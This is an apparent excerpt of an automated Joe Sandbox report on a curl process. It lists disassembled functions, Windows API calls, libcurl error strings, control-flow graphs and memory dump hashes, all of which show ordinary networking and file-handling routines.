                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d8c28446140be61784ed4364e249642bd1aa8307372c63b8045e5e274ddf4a7b
                                                                                                                                                                    • Instruction ID: 87084f18f4504312d196768ca088aacb4c7c72898891b0bf272c7805160e76d4
                                                                                                                                                                    • Opcode Fuzzy Hash: d8c28446140be61784ed4364e249642bd1aa8307372c63b8045e5e274ddf4a7b
                                                                                                                                                                    • Instruction Fuzzy Hash: CB324A30E342429FDB218F58D880FBDBBB0AF15314F25C25ED895AB292DB709D61CB61
                                                                                                                                                                    Function 002CF4C1 Relevance: 12.9, APIs: 6, Strings: 1, Instructions: 615COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,001C5539,00000000,00000109), ref: 002CF778
                                                                                                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,001C5539,00000000,00000109), ref: 002CF792
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,001C5539,00000000,00000109), ref: 002CF7B5
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,001C5539,00000000,00000109), ref: 002CF7C7
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,001C5539,00000000,00000109), ref: 002CFB8D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001C5539,00000000,00000109), ref: 002CFBB9
                                                                                                                                                                      • Part of subcall function 002CC0BD: CloseHandle.KERNELBASE(00000000,001C5539,00000000,?,002CF88C,001C5539,?,?,?,?,?,?,?,001C5539,00000000,00000109), ref: 002CC10D
                                                                                                                                                                      • Part of subcall function 002CC0BD: GetLastError.KERNEL32(?,002CF88C,001C5539,?,?,?,?,?,?,?,001C5539,00000000,00000109), ref: 002CC117
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CloseHandle$FileType
                                                                                                                                                                    • String ID: @
                                                                                                                                                                    • API String ID: 604914513-2766056989
                                                                                                                                                                    • Opcode ID: 7aab81b4f113e66871cc8cc1e9eee5a5654786710052b064e053427b3dafd9e8
                                                                                                                                                                    • Instruction ID: 5dc62943cebc0426eafd9d55eb49265976e9409bc2febbc6f0e6aa801d3a0da7
                                                                                                                                                                    • Opcode Fuzzy Hash: 7aab81b4f113e66871cc8cc1e9eee5a5654786710052b064e053427b3dafd9e8
                                                                                                                                                                    • Instruction Fuzzy Hash: 702222719305069BEF698F68CA91FEDBB62EB04324F24433DE521A72E1D7758D60CB81
                                                                                                                                                                    Function 001E8CB0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 274COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1629 1e8cb0-1e8ceb 1630 1e8ced-1e8cf3 1629->1630 1631 1e8cf5 1629->1631 1632 1e8cf8-1e8cfe 1630->1632 1631->1632 1633 1e8d08 1632->1633 1634 1e8d00-1e8d06 1632->1634 1635 1e8d0b-1e8d0d 1633->1635 1634->1635 1636 1e8d0f-1e8d16 call 1df690 1635->1636 1637 1e8d24-1e8d27 1635->1637 1641 1e8d1b-1e8d20 1636->1641 1639 1e8d29-1e8d43 call 1d3960 1637->1639 1640 1e8d44-1e8d4b 1637->1640 1643 1e8d4d-1e8d50 1640->1643 1644 1e8d86-1e8d8d 1640->1644 1641->1637 1648 1e8d5b-1e8d74 call 1e7dc0 1643->1648 1649 1e8d52-1e8d59 1643->1649 1645 1e8dae-1e8de1 GetTickCount64 call 2ccc40 1644->1645 1646 1e8d8f-1e8d92 1644->1646 1659 1e8e09-1e8e10 1645->1659 1660 1e8de3-1e8de8 1645->1660 1646->1645 1651 1e8d94-1e8da8 call 1e8810 1646->1651 1656 1e8d7a-1e8d7c 1648->1656 1657 1e8fe0-1e8fe7 1648->1657 1649->1644 1649->1648 1651->1645 1651->1657 1656->1657 1663 1e8d82 1656->1663 1661 1e8e5f-1e8e61 call 1e6210 1659->1661 1662 1e8e12-1e8e3e 1659->1662 1664 1e8dea-1e8df2 1660->1664 1665 1e8df5-1e8dfa 1660->1665 1670 1e8e66-1e8e68 1661->1670 1662->1661 1667 1e8e40-1e8e5c call 1d3850 1662->1667 1663->1644 1664->1665 1665->1661 1666 1e8dfc-1e8e07 1665->1666 1666->1661 1667->1661 1672 1e8fbe-1e8fca 1670->1672 1673 1e8e6e-1e8e80 call 1ee5c0 1670->1673 1673->1657 1676 1e8e86-1e8e8c 1673->1676 1677 1e8e92-1e8ea2 call 1dcfe0 1676->1677 1678 1e8f30-1e8f38 1676->1678 1686 1e8fcb-1e8fde 1677->1686 1687 1e8ea8-1e8eb4 1677->1687 1679 1e8f3a-1e8f46 1678->1679 1680 1e8fb3-1e8fbc call 1e6210 1678->1680 1683 1e8f48-1e8f50 1679->1683 1684 1e8f80-1e8f88 1679->1684 1680->1672 1680->1686 1690 1e8f56-1e8f5d 1683->1690 1691 1e8f52-1e8f54 1683->1691 1684->1680 1688 1e8f8a-1e8f90 1684->1688 1686->1657 1693 1e8eb6-1e8ef3 call 1dfe10 call 1d3960 1687->1693 1694 1e8ef4-1e8f2f call 1dfe10 call 1d3960 1687->1694 1688->1680 1695 1e8f92-1e8f96 1688->1695 1690->1684 1692 1e8f5f-1e8f7f call 1d3960 1690->1692 1691->1684 1691->1690 1695->1680 1698 1e8f98-1e8fb2 call 1d3960 1695->1698
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Operation timed out after %ld milliseconds with %lld out of %lld bytes received, xrefs: 001E8ED9
                                                                                                                                                                    • transfer closed with %lld bytes remaining to read, xrefs: 001E8F65
                                                                                                                                                                    • Done waiting for 100-continue, xrefs: 001E8E47
                                                                                                                                                                    • Operation timed out after %ld milliseconds with %lld bytes received, xrefs: 001E8F15
                                                                                                                                                                    • select/poll returned error, xrefs: 001E8D29
                                                                                                                                                                    • transfer closed with outstanding read data remaining, xrefs: 001E8F98
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: Done waiting for 100-continue$Operation timed out after %ld milliseconds with %lld bytes received$Operation timed out after %ld milliseconds with %lld out of %lld bytes received$select/poll returned error$transfer closed with %lld bytes remaining to read$transfer closed with outstanding read data remaining
                                                                                                                                                                    • API String ID: 1927824332-2257306976
                                                                                                                                                                    • Opcode ID: 3b1a8282d297614beec928b15c1ead8f3ceed4832a1dbed1479cad6caeabd994
                                                                                                                                                                    • Instruction ID: e8186fd6cd07c2a057839af6205d8e2ec070f2d73904eaba6521bc56cc5f1e1e
                                                                                                                                                                    • Opcode Fuzzy Hash: 3b1a8282d297614beec928b15c1ead8f3ceed4832a1dbed1479cad6caeabd994
                                                                                                                                                                    • Instruction Fuzzy Hash: 17915971700A41ABDB1C9F29DC41BAEB796FF94314F080239EC1D87292EB35E955CBA0
                                                                                                                                                                    Function 002C42B6 Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1928 2c42b6-2c42d5 call 2c7ec0 call 2c8f5f 1933 2c42db-2c42f1 1928->1933 1934 2c43a4-2c43b4 call 2c43d0 1928->1934 1935 2c42f7-2c430c DecodePointer 1933->1935 1936 2c4393-2c43a3 call 2c424c 1933->1936 1945 2c43df-2c43e4 call 2c7f05 1934->1945 1946 2c43b6-2c43cb call 2c90c9 call 2c412c 1934->1946 1939 2c430e-2c431b DecodePointer 1935->1939 1940 2c4382-2c4392 call 2c424c 1935->1940 1936->1934 1944 2c431e 1939->1944 1940->1936 1949 2c4321-2c4329 1944->1949 1957 2c43d0-2c43d4 1946->1957 1949->1940 1952 2c432b-2c4335 EncodePointer 1949->1952 1952->1949 1954 2c4337-2c4339 1952->1954 1954->1940 1956 2c433b-2c436c DecodePointer EncodePointer DecodePointer * 2 1954->1956 1962 2c436e-2c4371 1956->1962 1963 2c4373-2c4380 1956->1963 1958 2c43de 1957->1958 1959 2c43d6-2c43dd call 2c90c9 1957->1959 1959->1958 1962->1949 1962->1963 1963->1944
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 002C8F5F: EnterCriticalSection.KERNEL32(00000000,?,002C5D8A,0000000D), ref: 002C8F8A
                                                                                                                                                                    • DecodePointer.KERNEL32(00307C20,0000001C,002C420F,00000000,00000001,00000000,?,002C415D,000000FF,?,002C8F82,00000011,00000000,?,002C5D8A,0000000D), ref: 002C4303
                                                                                                                                                                    • DecodePointer.KERNEL32(?,002C415D,000000FF,?,002C8F82,00000011,00000000,?,002C5D8A,0000000D), ref: 002C4314
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,002C415D,000000FF,?,002C8F82,00000011,00000000,?,002C5D8A,0000000D), ref: 002C432D
                                                                                                                                                                    • DecodePointer.KERNEL32(-00000004,?,002C415D,000000FF,?,002C8F82,00000011,00000000,?,002C5D8A,0000000D), ref: 002C433D
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,002C415D,000000FF,?,002C8F82,00000011,00000000,?,002C5D8A,0000000D), ref: 002C4343
                                                                                                                                                                    • DecodePointer.KERNEL32(?,002C415D,000000FF,?,002C8F82,00000011,00000000,?,002C5D8A,0000000D), ref: 002C4359
                                                                                                                                                                    • DecodePointer.KERNEL32(?,002C415D,000000FF,?,002C8F82,00000011,00000000,?,002C5D8A,0000000D), ref: 002C4364
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Pointer$Decode$Encode$CriticalEnterSection
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3368343417-0
                                                                                                                                                                    • Opcode ID: 2a5e595a3942ef05c9ec45986d7b3cd8e5659ecdf3a93e9023eee62640fdac0e
                                                                                                                                                                    • Instruction ID: c8ef8f301edb244be7022a40da18fb6ea86d3322e5147b2cc6d30bf8977c3a42
                                                                                                                                                                    • Opcode Fuzzy Hash: 2a5e595a3942ef05c9ec45986d7b3cd8e5659ecdf3a93e9023eee62640fdac0e
                                                                                                                                                                    • Instruction Fuzzy Hash: AE317031924786DEDF11AFA9EC19B9D7BA5AB48311F20426FE404672A1DBF448A0CF15
                                                                                                                                                                    Function 001DCF00 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 001DCF32
                                                                                                                                                                    • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 001DCFAC
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001DCFB6
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 001DCFBE
                                                                                                                                                                    • Failed to set SO_KEEPALIVE on fd %d, xrefs: 001DCF3D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorIoctlLastsetsockopt
                                                                                                                                                                    • String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
                                                                                                                                                                    • API String ID: 1819429192-277924715
                                                                                                                                                                    • Opcode ID: 0abc77f613e772b442866dcf7dd72b5af5c29dd7f1353ce14cbe5f5cbae7d25b
                                                                                                                                                                    • Instruction ID: 6296d057fa333591abdfbf0a6c680d06cde10f3d0cc6db3aa39c05fb136f5614
                                                                                                                                                                    • Opcode Fuzzy Hash: 0abc77f613e772b442866dcf7dd72b5af5c29dd7f1353ce14cbe5f5cbae7d25b
                                                                                                                                                                    • Instruction Fuzzy Hash: A221CFB26047416BE310EF349C42BAB77E8AB84700F40062EF554D61C2E764D6048792
                                                                                                                                                                    Function 002CF370 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46libraryfileloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,001C5539,?,001C5539,00000000,00000109), ref: 002CF389
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 002CF390
                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,001C5539,?,001C5539,00000001,?,00000000,00000001,001C5539,?,001C5539,00000000,00000109), ref: 002CF3EE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCreateFileHandleModuleProc
                                                                                                                                                                    • String ID: CreateFile2$kernel32.dll
                                                                                                                                                                    • API String ID: 2580138172-1988006178
                                                                                                                                                                    • Opcode ID: df90aae9618b515aa9319402163bc94106907624daafcae48558df0689644553
                                                                                                                                                                    • Instruction ID: bf395e99883cfcd07057ee1196553da7064237d41b78e28ee3baa342df1d7596
                                                                                                                                                                    • Opcode Fuzzy Hash: df90aae9618b515aa9319402163bc94106907624daafcae48558df0689644553
                                                                                                                                                                    • Instruction Fuzzy Hash: EA11237292028EAFCF019F94DD05BAE7BB5FF08311F004269FD14A6250D771D9209B91
                                                                                                                                                                    Function 002D83C8 Relevance: 7.8, APIs: 5, Instructions: 253COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,00307F08,7FFFFFFF,00000000,?,002D869B,00000000,00D51038,00000000,00000000,?,?,?,?,00000000), ref: 002D8477
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002D869B,00000000,00D51038,00000000,00000000,?,?,?,?), ref: 002D84F1
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002D869B,00000000,00D51038,00000000,00000000,?,?,?,?), ref: 002D856C
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00D51038,00000000,00000000,?,002D869B,00000000,00D51038,00000000,00000000,?,?,?,?), ref: 002D8585
                                                                                                                                                                      • Part of subcall function 002BFD90: RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,00000001,?,?,?,002DA609,00000001,00000000), ref: 002BFDD3
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00D51038,00000000,00000000,?,002D869B,00000000,00D51038,00000000,00000000,?,?,?,?), ref: 002D8602
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapInfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1443698708-0
                                                                                                                                                                    • Opcode ID: 5bef42c9993d870f0a91ebc8d62cd11375a0c3958b4fbf4c8978db4f992eb684
                                                                                                                                                                    • Instruction ID: 1614f9498a1b1dbbfb17f3e9b1dc3a4497baed22f9abefe80239ee4235c814c0
                                                                                                                                                                    • Opcode Fuzzy Hash: 5bef42c9993d870f0a91ebc8d62cd11375a0c3958b4fbf4c8978db4f992eb684
                                                                                                                                                                    • Instruction Fuzzy Hash: 4081AD72E2025B9FDF219F94D885AEF7BB9EF49320F15415BE855A7341DA30DC208BA0
                                                                                                                                                                    Function 001DDAD8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 001DF690: WSASetLastError.WS2_32(00002726,00000000), ref: 001DF6E9
                                                                                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 001DDC0E
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001DDD67
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to connect to %s port %ld: %s, xrefs: 001DDDF0
